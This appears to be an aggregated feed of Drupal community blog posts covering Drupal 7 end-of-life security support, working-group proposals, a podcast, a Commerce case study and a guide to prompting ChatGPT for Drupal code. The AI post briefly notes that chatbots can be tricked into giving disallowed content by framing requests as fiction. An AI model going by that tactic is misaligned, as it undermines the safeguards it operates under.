  • Most regulatory language assumes a central entity with responsibility and accountability. Open source projects are often collaborative and decentralized. We provided several recommendations for defining 'collaborative' projects and flagged some concerns with use of the term 'decentralized' in their regulatory definition. 
  • The primary goal of our recommendations was to avoid inducing obligations (or the risk of fines) on entities that do not necessarily have formal legal relationships with each other nor formal 'ownership' of the software projects they are participating in. 

… and many more recommendations, as well. 

What comes next?

When the draft versions have been reconciled by the EU legislature and the new text is publicly available we'll share with the community. The legislative process will then move form the main body to the standards and implementation details created by the act. 

Dec 12 2023
Dec 12

Screenshot of a drupal.org release settings page. Contains a warning box with the text

The Drupal Security Team has announced in PSA-2023-06-07 that unsupported Drupal 7 modules/themes cannot be supported again. I'm proposing to create a D7Security team on Github that can provide security fixes for those unsupported modules. A small update module can then notify Drupal 7 site owners when new security releases are available on Github.

Background

A significant number of Drupal 7 sites are still operational. Some of these are scheduled for an upgrade to the more recent Drupal 10 platform, yet it is expected that a considerable number will continue to use Drupal 7 beyond its official support end date on January 5, 2025.

Those sites often include hundreds of Drupal 7 contributed projects from drupal.org. While some modules are maintained by the site owners in collaboration with the Drupal community, for many others, there's reliance on other maintainers for critical updates such as security and PHP compatibility.

Proactive Maintenance Approach

When a module in use cannot be supported by the original maintainers, the strategy is to assume the role of maintainers to extend security support. This is a practical decision: maintaining the code internally is essential for site security, so sharing these updates with the community as official releases is beneficial. This shared responsibility model is very common in the Drupal community.

Blocked on unsupported projects

While taking on the role of maintainers has been effective previously, there are now obstacles in continuing this on drupal.org. The Drupal Security Team is inclined to discontinue support for Drupal 7 projects. As a result, once a Drupal 7 project loses support, the policy is now to not mark it as supported again.

I have a lot of empathy for the Drupal Security Team: many of the members don't run Drupal 7 sites anymore and it can be a hassle to track down Drupal 7 module maintainers when preparing security releases. That's why they want to phase out Drupal 7 support where possible. However, there's potential to reallocate the tasks related to Drupal 7 security to a group specifically interested in maintaining these older versions.

Establishing an unofficial D7Security team on Github

In order to unburden the Drupal Security Team and the Drupal Infrastructure team I think it would be best to establish an unofficial Drupal 7 security team (let's call it D7Security team) on Github. I will describe later how we can communicate security releases from Github through the standard Drupal 7 update notification system.

The D7Security organization on Github would be completely independent of the Drupal Security Team with these benefits:

  1. Drupal 7 modules can get unsupported on drupal.org, but releases (including security updates) can be made on Github. Maintainers and the security team don't have to feel guilty: D7Security will pick it up if it is used by a member company.
  2. The Drupal Security team can publish any non mass-exploitable Drupal 7 vulnerability, as is already policy. Then the D7Security team can pick it up.
  3. For mass-exploitable remote code execution vulnerabilities the Drupal Security Team can reach out to the D7Security team with a warning even beyond January 5, 2025.

Pushing update notifications from Github to Drupal 7 sites

The update notification system of Drupal 7 works with XML feeds that are downloaded from drupal.org (example for devel module). Luckily this update system is pluggable and we can apply some nice tricks to download update information XML from static Github files instead.

The rough workflow would go like this:

  1. The unsupported module code is forked to a Github repository.
  2. A fix is committed, a new git tag and a release is created on Github.
  3. The update XML is crafted by hand (later automated) in a central Github repository pointing to the Github release (dummy example for devel). The path devel/7.x is important as that will be appended by update module when fetching the XML.
  4. The module is added to the list of supported modules on Github (dummy example for devel)
  5. The Drupal 7 site operator installs a small helper module that fetches update information from Github on top of the default drupal.org source. The example code for that is just a few lines of code:
/**
 * Implements hook_update_projects_alter().
 */
function d7sec_client_update_projects_alter(array &$projects) {
  // Fetch the list of supported D7 projects from GitHub.
  $d7sec_supported = drupal_http_request('https://raw.githubusercontent.com/klausi/d7sec_update/main/supported_projects.txt');
  if ($d7sec_supported->code == 200) {
    $supported_projects = explode("\n", $d7sec_supported->data);
    foreach ($supported_projects as $supported_project) {
      $supported_project = trim($supported_project);
      if (isset($projects[$supported_project])) {
        // Replace the project update XML URL with our own, pointing to Github.
        $projects[$supported_project]['info']['project status url'] = 'https://raw.githubusercontent.com/klausi/d7sec_update/main';
      }
    }
  }
  else {
    watchdog('d7sec_client', 'Could not fetch supported projects list from GitHub: <pre>@errorpre>', [
      '@error' => print_r($d7sec_supported)
    ], WATCHDOG_ERROR);
  }
}

This will now show any new releases in the Drupal 7 backend as usual and trigger update notification emails.

The great benefit of this static file approach is that there are no update server operation costs.

One important thing missing here is the drupal.org packaging script which adds version information into the module's info file. I'm sure there are some other details as well that I have missed, but the approach should work in general.

Why Github?

It should be possible to do a similar approach on drupal.org's Gitlab, but I think it could get very confusing where the actual replacement code for a module lives. I prefer Github for organization governance reasons, then it is easy to define repository access based on groups.

Conclusion

This is currently a proposal that I would like to get feedback on. Feel free to reach out and discuss in the Drupal ideas issue.

Dec 11 2023
Dec 11

The Technical Working Group (TWG) is announcing two coding standards changes for final discussion. Feedback will be reviewed at the meeting scheduled for Tuesday 2 January 2024 2100 UTC.

Issues for discussion

The Coding Standards project page outlines the process for changing Drupal coding standards.

Join the team working on Coding Standards

Join #coding-standards in Drupal Slack to meet and work with others on improving the Drupal coding standards. We work on improving our standards as well as implementing them in the core software.

Dec 11 2023
Dec 11

Today we are talking about Being a Digital Nomad, common nomadic hurdles, and realized work/life benefits with guests Chad Hester and Shelley Goetz. We’ll also cover Flag as our module of the week.

For show notes visit:
www.talkingDrupal.com/428

Topics

  • What does digital nomad mean?
  • When did you first start to think about this
  • What was your physical journey like
  • What do you do for work
  • What is the biggest win
  • How did this affect family dynamics
  • What was the biggest gotcha
  • Tips and tricks
  • Long term plan
  • Why not Europe or South America
  • Question from Stephen: As a Patriots fan what are your thoughts on the 2023 season, is Bill Belichick staying or going

Resources

Guests

Shelley Goetz - shelleygoetz
Chad Hester - chadkhester.com chadhester

Hosts

Nic Laflin - nLighteneddevelopment.com nicxvan
John Picozzi - epam.com johnpicozzi
Ron Northcutt - community.appsmith.com rlnorthcutt

MOTW

Correspondent

Martin Anderson-Clutz - @mandclu
Flag

  • Brief description:
    • Have you ever wanted a simple way to let users bookmark, like, or even flag as inappropriate content on your Drupal site? There’s a module for that.
  • Brief history
    • How old: originally created in 2008 by quicksketch, who listeners may remember as the original author of Webform
    • Versions available: 7.x-3.9 and 8.x-4.0-beta4
  • Maintainership
    • Actively maintained, but no commits in the last year
  • Has a handbook, but it’s in the old documentation system
  • Number of open issues: 675, 132 of which are bugs against the 8.x branch
  • Usage stats:
    • Over 38,000 sites
  • Maintainer(s):
    • Recent releases by Berdir, who we recently mentioned as the maintainer of TMGMT in episode #426
  • Module features and usage
    • The Flag module provides a flexible system that can reference any kind of entity, so content, users, comments and so on
    • When you create a flag type, you set the target entity type, and then you can optionally choose specific bundles that can be flagged
    • Flags can be per-user, like bookmarks, or global, meaning that they’re the same for everyone
    • Links to Flag or Unflag content or other entities can be displayed in a variety of ways: in a field, in entity links, as contextual links, and more
    • By default flag links are rendered as AJAX links that flag or unflag content without reloading the page, but you can configure them to display in various ways, including a links to a field entry form, because flag types are also fieldable
    • There is extensive views integration, so it’s easy to list flagged content, for example to show a user content they’ve flagged as their favorites. The ecosystem of modules around Flag includes one called Views Flag Refresh that can trigger a view to automatically update via AJAX as soon as any content in that view is flagged or unflagged
    • Not long ago I used Flag as part of a lightweight task management system within Drupal, and anyone wanting to try that out can install the Tasks module
Dec 11 2023
Dec 11

Client

Our web studio was commissioned to develop a B2B platform for vendors and buyers of refrigeration and air conditioning equipment. On the platform, suppliers can add their products to the catalog, publish articles, advertise their services, and search for clients and contractors for free. We developed the website and implemented the Drupal Commerce framework. But the latter turned out to be an awful waste of time.

b2b platform development

How did this happen?

The client asked, among other things, to implement a subscription functionality on the website. The subscription expands the free plan and allows users to publish more articles, attach more files, and post job ads.

The functional spec stated that information about a subscription request should be stored in Lexoffice, a third-party service. However, the client did not specify which tool should be used to implement the functionality on the website itself. Based on the experience, we decided to use Drupal Commerce for this. After installation, questions followed, such as why checkout appeared on the site and so on.

Drupal Commerce is a set of modules that help businesses sell online. With it, the site owner presents products, accompanies the client at all stages of placing an order, tracks invoices, receipts and payments, and arranges delivery.

Role of Drupal Commerce

As the work progressed, details that were missing from the specification began to emerge. It turned out that the payment for the subscription was to be made through a third-party service. Here was what the process looked like: the user selected a plan, clicked Submit, the data was collected from their registration form or profile, sent to a third-party API to verify tax information, and only then to Lexoffice. The site owner saw the order in the Lexoffice admin panel and sent the client an invoice, which he paid through a bank.

subscription service development


However, subscriptions in Drupal Commerce can only be paid for directly on the website. The module cannot process such a complicated path. By default, it doesn’t even have a subscription feature. In this case, Drupal Commerce was used only to store the plan terms, create orders, and send them to Lexoffice. Payments were processed by another service. As a result, the module’s acquiring functionality was not needed here; simple Drupal would be enough.

What could have been done better

The subscription feature could have been realized faster and without resorting to additional Drupal modules. We spent a lot of time integrating the website with Lexoffice (about 80 hours) due to this service’s poor documentation. Another 40 hours were spent changing the Orders entities in Drupal Commerce. Without the module, we would have written a custom service that would send the order to the payment service in 20 hours and call it a day.

But Drupal Commerce can still come in handy! The client is considering expanding the website’s functionality, for example, adding the option to publish 10 more advertisements for an additional fee. In this case, the module will be used for its intended purpose.

Dec 11 2023
Dec 11

We’re back with our monthly selection of our favorite Drupal articles & most important Drupal-related news. We hope you enjoy the November edition!

Beyond Code: Drupal’s Community, Impact, and Possibilities

For the first article from November, we have a great piece by Tiffany Farriss of Palantir about Drupal being more than just code and it goes hand in hand with community, since the code itself is a direct expression of the open-source values that Drupal has been built and has thrived on.

Tiffany’s article draws an interesting comparison between Drupal and the Ship of Theseus, since Drupal has changed so much since its inception over 20 years ago, yet its essence still remains the same. Finally, it challenges some outdated tenets of the Drupal community, such as emphasizing the need to get off the Drupal island, and closes by highlighting the importance of Drupal’s Open Web Manifesto.

Read more about Drupal’s community, impact & possibilities

On a 1-10, How Important is Your Drupal Website?

The next article comes from Danita Bowman of Promet Source and focuses on the risks of outdated legacy technologies such as Drupal 7, while contrasting that with the enhanced capabilities of newer versions and making a strong case for upgrading to Drupal 10, as well as exploring the reasons for such a large number of sites still running on the outdated Drupal 7.

Some of the major issues Danita’s article exposes are the viability of legacy technology and the fast approaching end of life for Drupal 7, meaning no security coverage or new features, except by custom request, as well as diminished Drupal 7 support from the community of contributors.

Read more about how Drupal 7 compares to the latest versions

CKEditor 5 Empowers Creativity: What's New in Drupal 10

Moving on, this article from Tony Hutson of cti digital also talks about the benefits of Drupal 10, but focuses particularly on the features of the new CKEditor 5 that comes out of the box in Drupal 10, and how these improve the experience of content editors working with Drupal. 

The features that Tony highlights are streamlined drag and drop; better link and table management; optimized handling of images and fonts; as well as a number of other useful extensions, plus the suite of CKEditor 5 premium features, including the Productivity Pack premium bundle. 

Read more about CKEditor 5 in Drupal 10

Love thy CMS!

It’s a rare occasion not to include an article from the Schema.org Blueprints modules maintainer Jacob Rockowitz in our monthly overview. In this one, he talks about learning to love your CMS, an idea that’s often been discussed in the Drupal community over the years in different settings.

An internal discussion at Jacob’s organization about the concept of loving one’s CMS was also the basis for his session demoing how Schema.org can help streamline Drupal’s content authoring experience, with the more appealing and poetic adjustment of “Love thy CMS!”.

Read more about loving thy CMS

A brief history of Drupal 7 and overview of end-of-life options

Since the Drupal 7 end of life is fast approaching (the final extension will end in just over a year), there has been a lot of important content lately related to the D7 EOL and what site owners’ options are. 

This great article from Kristen Pol of QuantCDN not only provides an overview of the end-of-life options, but also takes a look at the history of Drupal 7 since its release in January 2011 and how the fundamental reworking of the CMS with Drupal 8 impacted the community and led to the creation of Backdrop CMS.

Read more about the history of Drupal 7 & its EOL

Elevated Marketing Strategies with Drupal

Next up, we have an article about how Drupal empowers marketers, written by Kyla Tucker of Acro Commerce. The main benefits for marketers are streamlined back-end management, Drupal’s customizability, mobile-optimized design, top-notch SEO & analytics capabilities, and other useful UX features such as strong multilingual support.

To businesses that successfully leverage Drupal for their marketing strategies, the benefits are also plentiful; Drupal is cost-effective, prioritizes security, and has a number of other advantages stemming from its open-source nature that have transformed it into something more than a mere content management system.

Read more about using Drupal in your marketing strategy

The Pitchburgh Diaries - decoupled Layout Builder Sprint 5 & 6

We continue with an article by Lee Rowlands of PreviousNext who provides an update on the latest progress done on their Pitchburgh project, a React-based decoupled Layout Builder. 

This article breaks down the work of the final two out of six sprints that were part of the Pitchburgh budget, with the first four focusing on feature development and sprints 5 and 6 on instantiating the Layout Editor in an actual Drupal website.

Lee covers the key highlights from these two final sprints, and concludes by announcing that the PreviousNext team plan to continue working on this project beyond what was covered through Pitchburgh and already have a backlog of new desirable features.

Read more about decoupled Layout Builder Sprint 5 & 6

Drupal 10 will be supported until the release of Drupal 12 in mid-late 2026

Last on our Drupal news overview for this month is a blog post from Gábor Hojtsy announcing the Drupal release schedule from now up until the release of Drupal 12 in 2026. 

Following this new release schedule, a new major version will be released every two years, with two years of active support and an additional two years of maintenance and security coverage (e.g. for Drupal 10, this means support will end in 2026 with the release of Drupal 12).

Read more about Drupal’s future release schedule

People releasing lit lanterns into the air at night as part of some kind of festival and/or tradition

With that we conclude our November selection of top Drupal blog posts. We hope you enjoyed this month’s edition!

Dec 08 2023
Dec 08

Lenny Moskalyk headshot

We're thrilled to introduce Lenny Moskalyk, one of the newest members on the Drupal Association Board. Lenny is a Senior Project Manager at Cocomore and is involved in organizing DrupalCamp Kyiv. She's actively engaged in the Ukrainian Drupal Community and serves as an Advisory Board Member of DrupalCon Europe, among other contributions to various Drupal events. Recently, Lenny received the Women in Drupal 2023 award in the ‘Scale’ category, given to those who boost growth in Drupal—her accomplishments that led to this award represent the value of growth within the Drupal Community. 

Lenny recently joined the Drupal Association Board, and she shares her insights on this exciting journey:

What are you most excited about when it comes to joining the Drupal Association Board?
The opportunity to help and contribute back to the community in an efficient meaningful way.

What do you hope to accomplish during your time on the board?
I aim to build connections with underrepresented communities and make sure their voices are heard.

What specific skill or perspective do you contribute to the board?
Being the first Ukrainian on the Board, I am representing one of the biggest and most active communities in Europe. I have experience in organizing Drupal events of various scales and being an experienced project manager, I have excellent communication skills.

How has Drupal impacted your life or career?
I started to work with Drupal around 10 years ago and from the day the ideas of open source and support within the community won my heart. It inspired me to try myself in new roles, such as co-organizing DrupalCamp Kyiv. Through Drupal, I have discovered many new things about different cultures and nowadays wherever around the world I would go—I know for sure where to find like minded people :)

Tell us something that the Drupal community might not know about you.
I am a passionate traveler who recently added sailing skills! Another thing that brings me joy is cooking for my loved ones and sharing meals with them :)

Share a favorite quote or piece of advice that has inspired you.
“Fortune favors the brave.”

We can't wait to experience the incredible contributions Lenny will make during her time on the Drupal Association Board. Thank you, Lenny, for dedicating yourself to serving the Drupal community through your board work! Connect with Lenny on LinkedIn.

The Drupal Association Board of Directors comprises 12 members, with nine nominated for staggered 3-year terms, two elected by the Drupal Association members, and one reserved for the Drupal Project Founder, Dries Buyteart. The Board meets twice in person and four times virtually annually, overseeing policy establishment, executive director management, budget approval, financial reports, and participation in fundraising efforts.

Dec 08 2023
Dec 08

The Drupal core committers and Drupal 10 readiness initiative are seeking feedback on a proposed new working group. The group's mission is to focus on contributed modules where a maintainer has not updated to the next major Drupal version. This includes modules where the maintainer has requested assistance as well as modules where the maintainer is no longer active. This effort will benefit the entire Drupal ecosystem.

This group will have elevated privileges on Drupal.org like those that exist for the Security Team and Site Moderators.

Background

Currently the Project Update Bot generates automated compatibility patches for contributed projects. These patches are reviewed and tested by Drupal community members and then set to the "Reviewed & tested by the community" status.

However, for some modules, these patches are not committed in a timely fashion. This creates a barrier to updating to the next Drupal major version for sites that use this module.

There are existing workarounds. One is the Composer Lenient plugin which allows affected sites to install a patched version of the module. However, this is not a substitute for having a compatible version of the module.

Proposal

Establish a working group that has the ability to appoint its members as a temporary maintainer of a project. The only task of the temporary maintainer is to review, test and commit a patch or merge request that makes the module compatible with the new Drupal major version and optionally create a new release. The group will be able to take this action in the following circumstances:

  1. The project MUST have a canonical issue for updating to the next major version of Drupal. This issue MUST have a patch or merge request. The issue MUST be marked "Reviewed & tested by the community" and MUST NOT have had feedback from a module maintainer within the past two weeks. The following proposal refers to this as the contributed project issue.

  2. An attempt MUST have been made by members of the community to contact the module maintainers via their Drupal.org contact form. Record of this attempt MUST be recorded on the contributed project issue.

  3. An attempt SHOULD be made by members of the community to contact the module maintainers via a messaging platform such as the Drupal community Slack. Record of this attempt MUST be recorded on the contributed project issue.

  4. If there is no response from the module maintainer for seven (7) days, a member of the community MAY escalate the module to the Project Update Working Group.  To escalate a module, create a separate issue in the Project Update Working Group issue queue. This is termed the project update group issue. An attempt SHOULD be made to notify members of the Project Update working group via a messaging platform such as the Drupal community Slack.

  5. The Project Update Working Group MUST make a subsequent attempt to contact the module maintainers via their Drupal.org contact form. This communication MUST outline that failure to respond within seven (7) days may result in the Project update Working Group committing the contributed project issue on their behalf. Record of this contact MUST be recorded on the contributed project issue. Any communication between the Project Update Working Group and the module maintainers MUST be recorded on the project update group issue.

  6. When the seven-day period from item 5 has elapsed, the maintainer has had two weeks overall to respond. At this point, a member of the Project Update Working Group MUST decide on the next step. The next step is to either intervene or not. If the decision is to intervene, then the group must also decide if a tagged release is to be made as well as committing the change.  When making the decision the Project Update Working Group member MUST do the following.

    1. Take into consideration recent activity from the maintainer in the project.

    2. Take into consideration the age of the contributed project issue.

    3. Take into account the complexity of the patch/merge request. They must work to avoid regressions. The level of automated test coverage for the project SHOULD be used to inform the likelihood of a regression.

    4. Take into account the quality of the reviews.

    5. Take into account the possible lifespan of the module and the needs of the community. For example, if the module duplicates functionality added to core or another module, then they may decide not to intervene.

    6. Consider if the module is looking for new maintainers and if anyone has nominated themself for the role. The Project Update Working Group SHOULD favor supporting a new maintainer over intervention.

    7. The Project Update Working Group SHOULD aim to achieve compatibility with the major version in a backwards-compatible way.

  7. If a member of the Project Update Working Group decides to intervene and commit the patch, then the following occurs:

    1. A record of the decision MUST be recorded on the contributed project issue.

    2. The member of the Project Update Working Group MUST nominate to make the commit and/or release. Record of this nomination MUST occur on the contributed project issue.

    3. The member of the Project Update Working Group MUST make a temporary change to the project's maintainers to add themself as a maintainer. Record of this change MUST be made on the contributed project issue.

    4. The member of the Project Update Working Group with temporary maintainer access will then commit the  patch or merge request. This MUST be recorded on the contributed project issue. 

    5. The member of the Project Update Working Group MUST acknowledge that the commit was made on the contributed project issue.

    6. If it was decided that a release should be made, a member of the Project Update working group will create a tag and add a release node for the tag on Drupal.org. The member making this action MUST make a record of this on the contributed project issue. The release MUST follow semantic versioning rules for backwards compatibility. The member SHOULD strive to make a new minor version to allow sites to install a compatible version without updating the major version of Drupal.

    7. If the module maintainer has not requested assistance from The Project Update group, a member of the Project Update Working Group MUST update the project node on Drupal.org to change it to 'No further development'. If the module has opted in to Security team coverage, the member of the Project Update group MAY opt the module out of this coverage.

    8. Any member of the Project Update Working Group MUST then mark the original contributed project issue as fixed. This action SHOULD NOT prevent opening of new issues for the project for major version compatibility.

    9. A member of the Project Update Working Group MUST revoke the temporary maintainer rights within fourteen (14 days). Record of this change MUST be recorded on the contributed project issue. 

    10. If the module was marked 'No further development' and if no such issue exists for the contributed project - a member of the Project Update Working Group MUST open a new issue in the project's queue seeking a new maintainer.

    11. If additional compatibility issues are found between the module and the next major version of Drupal, the process above repeats.

Working group membership

The working group will comprise community members who self-nominate. Interested community members must receive two seconding recommendations from other community members. Nomination and seconding will occur publicly on Drupal.org in the Project Update Working Group issue queue. Community members will be able to share their thoughts or concerns on the nominees' applications. Concerns relating to conduct of members of the group MUST follow Drupal's standard Community Working Group processes.

The initial membership of the group will comprise at least five (5) individuals. Members of the group should have a record of maintaining core or contributed projects and have the git-vetted role on Drupal.org. In addition the group may contain provisional members. These members will not have the ability to change project maintainers and will require the support of a full member to carry out their duties.

The initial make up of the group will be vetted by the core committer team and security team. Subsequent appointments will be vetted by the Project Update Working Group with a fourteen day period for veto from the security team and/or core committers.

Membership of the group is for a single major update. For example, from Drupal 10 to Drupal 11. The first major update in which the group is active will be from Drupal 10 to 11. At the end of each major cycle, members can opt to renew their membership for the next major update cycle. As with the original nomination, this process will happen in public and require two seconding recommendations from the community. 

Additional lifecycle option

To complement this process, it is proposed that a new Abandoned lifecycle status is added for project info files.

If this is successful, the following changes will be made;

  1. The process at (6) above will be amended such that the module's info file is updated to set the lifecycle value to 'abandoned'.

  2. A lifecycle link is added that points to the issue in the project's queue where a new maintainer is sought.

Comment period

Community feedback is sought on the proposed process. Please use this issue to add your input. The feedback period will last until Friday January 12th 2024.

Dec 07 2023
Dec 07

2023 appears to be the year that Artificial Intelligence emerged from the shadows and into the mainstream, but the potential of AI has barely scratched the surface. AI is here and its impact on life and work is developing at an exponential pace

As this disruptive technology is generating quick answers, streamlining processes, and creating vast new efficiencies, hundreds of possibilities for AI – ranging from healthcare diagnoses, to cybersecurity threat detection, government services, Drupal development, API development, and many, many more – are taking shape.

This post will explore how an AI large language model (LLM), such as ChatGPT, can be used for writing code – specifically, a Drupal module.

Getting Started with an LLM: Prompt Engineering

An LLM is essentially a massive, simulated brain trained on an even more massive amount of data.  LLMs such as ChatGPT are extremely good at identifying the "next best word" in a conversation to the point where human-like intelligence emerges.

Interacting with an LLM is done conversationally, beginning with a "prompt." Think of this process like writing a software program, with conversational English being the programming language.  

The first step in leveraging an LLM to give it context. Even if the context of what is being asked appears obvious, stating it explicitly can increase the quality of ideas and insights that are returned.  

For the purpose of generating code, a good example of a starting prompt could begin with: "You are an expert Drupal 10 developer..."  Since the answer is built one word at a time, an explicit prompt such as this helps to create a framework for success.  
 

What is the “Chain of Thought” Technique in AI?

Another technique called "Chain of Thought" can be very helpful to increase the quality of an AI response. The idea is to list out the steps the AI should take when thinking about a solution. This is similar to writing a software program except communication is at a higher level of abstraction.   

For example, rather writing a prompt that reads: "As an expert chef, please give me an apple pie recipe," the Chain of Thought technique would provide deeper, step-by-step instructions such as:

"As an expert chef, please think about different, popular apple pie recipes, specifically looking at the crust and the filling. Identify the best aspects from the different recipes. Consider how they could be combined to make an even better recipe. Finally, generate a final recipe."

For more complex topics, the Chain of Thought technique can be broken into multiple steps in a dialogue with an AI tool such as ChatGPT.
 

Refining the Prompt

Because an LLM can act as a natural language program interpreter, giving it rules to follow will help it to better achieve the right results. Here’s an example of writing a prompt for the purpose of help in writing prompts: 

"You are an expert Prompt Engineer. Your goal is to craft the best possible prompt to be used by ChatGPT. Please follow the process below:"

  • "Your first response will be to ask me what the prompt should be about. I will provide my answer, but we will need to improve it through continual iterations by going through the next steps."
  • "Based on my input, you will generate two sections: a) Revised prompt (provide your rewritten prompt. It should be clear, concise, and easily understood by you), and b) Ask any relevant questions pertaining to what additional information is needed from me to improve the prompt."
  • "We will continue this iterative process with me providing additional information to you, and you refining the original prompt in the 'Revised prompt' section until I decide this process is complete."
  • "Do not actually process the prompt once it is ready. That will be done in a separate conversation."

AI for Code Creation

Now that we've covered various aspects of Prompt Engineering, let's look at using LLM prompts for code generation. Here are some tips:

  • Generate fully completed code. If the solution you're generating is relatively straightforward, it may be easier to ask the AI to generate fully completed code rather than using placeholder comments. gpt-4 has a tendency to use placeholders which may or may not be helpful depending on the task at hand.
  • Let it know that it is okay to generate a long response. Your prompt could read something like: "It is okay if your response stops abruptly; I will say 'continue.'"
  • Be sure to give it context at the beginning, such as: "You are an expert Drupal 10 developer."
  • Use Chain of Thought to help guide it. By "holding its hand" and providing more detailed steps, the end result is more likely to work correctly.

Sample Chain of Thought Prompt for Creating a Drupal Module

  • You are an expert Drupal 10 developer. 
  • You will be writing a module called "awesome_csv_importer"
  • This module will provide a form where a CSV file can be uploaded. This CSV file will contain data for creating article nodes. Each row will contain a "title" and "body" field.
  • The author for each node should be user 1.
  • Before proceeding, think about Drupal best practices for this CSV import.
  • If there is an issue, an error should be output as a Drupal message.
  • For each file in this module, please note the file's path within the module.
  • Please generate fully completed code; do not use placeholder comments.
  • Please be sure to properly comment on your code, following Drupal code standards.
  • It is okay if your response stops abruptly. "I will say 'continue.'"

Here's a screenshot of the beginning of the gpt-4's response to this prompt:

ChatGPT prompt to create Drupal module

After the initial code is generated, there is often an iterative process as issues are identified by reviewing or running the code, and then the AI tool is asked to make corrections. If errors are encountered it is sufficient to just paste the error into a follow up message.

For more complex solutions, it may be more appropriate to generate sub-sections of the module via different conversations rather than using a single conversation to generate the whole module.

Limitations of AI for Drupal Development

  • Maximum input limitations. First, there are limits to the allowable size of the prompt. The specific size depends on the LLM model in use, but the limits are relatively large so should not be a concern for most tasks. It's important to note that when having a conversation with an LLM, each message sent is within the context of the entirety of the previous preceding dialog in the conversation. This means the AI can lose some context in a longer conversation since compression techniques must be used "behind the scenes" to avoid hitting the current LLM's max input limit. When this is the case, it can be appropriate to start a new conversation, with an explanation of what has been covered up to that point, along with any relevant code that it has been generated.
  • Scalability. When using LLM APIs such OpenAI's API, there are limitations on concurrent requests. Particularly for public-facing solutions, it may be necessary to implement queuing and caching mechanisms.
  • Hallucinations. Sometimes, LLMs appear to simply make things up. For example, I've had LLMs generate Drupal code using methods and hook that simply do not exist, but would be appropriate to use if they did exist. Often, if you point this out the AI will acknowledge its mistake an provide an alternative solution.
  • Bad judgment. Sometimes, LLM-generated code will work but may not be implemented in the best way. For example, I once asked for code to modify a Drupal view's results but the LLM tried to alter the view's SQL query, which is a less flexible, less maintainable solution than was needed. I've also seen instances where the LLM used pure PHP solutions rather than Drupal-specific solutions. It may also use solutions from older versions of Drupal that might work currently but will fail for future versions.
  • Security concerns. Another critical factor to keep in mind when using LLMs is to never submit sensitive information like passwords. This is because your input may be used to train future LLM models, meaning hackers could, with the right prompt, obtain an output containing this information. While LLM's like ChatGPT have been trained to behave lawfully, they can be tricked into straying from this by asking for "dis-allowed content" within the context of a fictional story.
  • Wrong answers. Sometimes, LLMs simply choose the wrong steps to follow, resulting in an incorrect result. Here's a simple example using math. (Incidentally, you'll notice this response is using a pirate persona. This is because I was experimenting with ChatGPT's custom instructions setting at the time.) In the below example, GPT gives the wrong answer to a simple math problem and then admits it doesn't know why it did that.


ChatGPT producing a math error

Prompting for the Big Picture: AI for Drupal Module Development

The above represents real world walk throughs and recent experiences for leveraging an LLM to develop a Drupal module. There’s much more. As another demonstration of the instant insights and information that  ChatGPT can provide, I recently entered a ChatGPT prompt that read: 

Can AI be leveraged to develop a module in Drupal?

Here's the answer that resulted from this prompt:

ChatGPT logo

Yes, AI can be leveraged to develop modules in Drupal. Drupal is an open-source content management system (CMS) that allows developers to create and customize websites. AI technologies can be integrated into Drupal modules to enhance various aspects of a website, such as personalization, content recommendation, natural language processing, and more.

Here are some ways AI can be incorporated into Drupal modules:

Content Personalization:

  • Use AI algorithms to analyze user behavior and preferences.

  • Develop a Drupal module that dynamically displays personalized content based on user preferences, improving user engagement.

Chatbots and Conversational Interfaces:

  • Integrate AI-powered chatbots or conversational interfaces within Drupal websites.

  • Create a module that allows users to interact with the website using natural language, providing a more user-friendly experience.

Search Optimization:

  • Implement AI-driven search algorithms to improve the accuracy and relevance of search results.

  • Develop a Drupal module that integrates advanced search capabilities powered by AI.

  • Image and Video Recognition:

  • Utilize AI for image and video recognition within Drupal.

  • Create modules that automatically tag and categorize media content based on AI analysis.

Data Analytics and Reporting:

  • Integrate AI for data analytics to extract meaningful insights from user interactions and website performance.

  • Develop Drupal modules that provide detailed analytics and reporting using AI algorithms.

Security Enhancements:

  • Implement AI-driven security measures to identify and prevent potential threats.

  • Develop modules that use AI to enhance website security by detecting and responding to malicious activities.

Automated Content Generation:

  • Use natural language processing (NLP) algorithms to automatically generate content.

  • Develop Drupal modules that assist in creating and optimizing content based on AI-generated suggestions.

When integrating AI into Drupal modules, it's important to consider factors such as data privacy, performance, and the specific requirements of the website. Additionally, leveraging existing AI libraries and frameworks can simplify the development process. Drupal's modular architecture makes it well-suited for incorporating AI functionalities into various aspects of a website.

What's Next for AI with Drupal?

As amazing and disruptive as today's LLMs are, they are only going to become faster and more capable as research continues.

It is hard to predict the rate at which LLM solutions will evolve because there may be unexpected bottleneck; it may be that availability of computational resources will be the main limiting factor for how smart these LLM can become.

However, it is safe to say that current and upcoming AI solutions will disrupt many aspects of business and technology, perhaps even more than the Internet did in the 1990s. In the same way that media companies evolved to leverage the Internet, AI will drive a similar evolution. 

While the future is not clearly mapped out, the time to embrace AI is now. 

Interested in architecting AI-powered solutions for your Drupal website? Promet is at the leading edge of exploring the potential and possibilities of AI for Drupal web development. Let’s talk!

Dec 07 2023
Dec 07

Here's the next part of our ongoing series dedicated to assisting Drupal 7 site owners in upgrading their websites to Drupal 10. There are many great reasons to upgrade. The modern Drupal offers powerful features for content editors including: customizable editorial workflows, a layout builder for your landing pages, a media library that makes managing and reusing media easier than ever, and more. Developers can leverage the most of these advancements.

In our previous blog post, we discussed using our questionnaire to develop a plan, understanding your budget, and deciding whether to work with a certified partner from our list or take the DIY approach for your migration. As we get closer to the start of 2024 and to Drupal 7 End of Life, it's crucial to consider the next phase. Now, you need to secure your website's future but also start to map your information architecture and enhance your content strategy. In this blog post, we'll explore what that means and why these steps are crucial as you prepare to transition away from Drupal 7.

Understanding Information Architecture and Content Strategy

At its core, these steps are vital to ensure a smooth transition to a new version. Mapping information architecture involves creating a blueprint of your website, showcasing where every piece of content is located and how it's interconnected, along with the key content types, views, and taxonomies crucial to your site. This is crucial because when you transition away from Drupal 7 to a new version, having a clear plan ensures that your website's structure remains organized. Such clarity helps prevent issues like data loss, broken links, and confusion for your website visitors.

Drupal offers tools and features empowering site builders and developers to create and manage a structured website tailored to your specific needs.

Additionally, when you assess your content strategy, you're essentially conducting a thorough review of the quality, relevance, and overall effectiveness of the content on your website. This is crucial during migration as it ensures your content remains valuable, fits the new platform's goals, improves user experience, and maintains or boosts SEO rankings. This preparation is vital for a smooth transition and to maintain the integrity of your content in the new setting.

To learn more about information architecture, explore the information architecture guide. For insights into content strategy, refer to this content strategy guide. For a comprehensive checklist when launching a website, visit the major version upgrade documentation.

Here are some recent sessions from DrupalCon worth exploring:

What does End of Life mean for you?

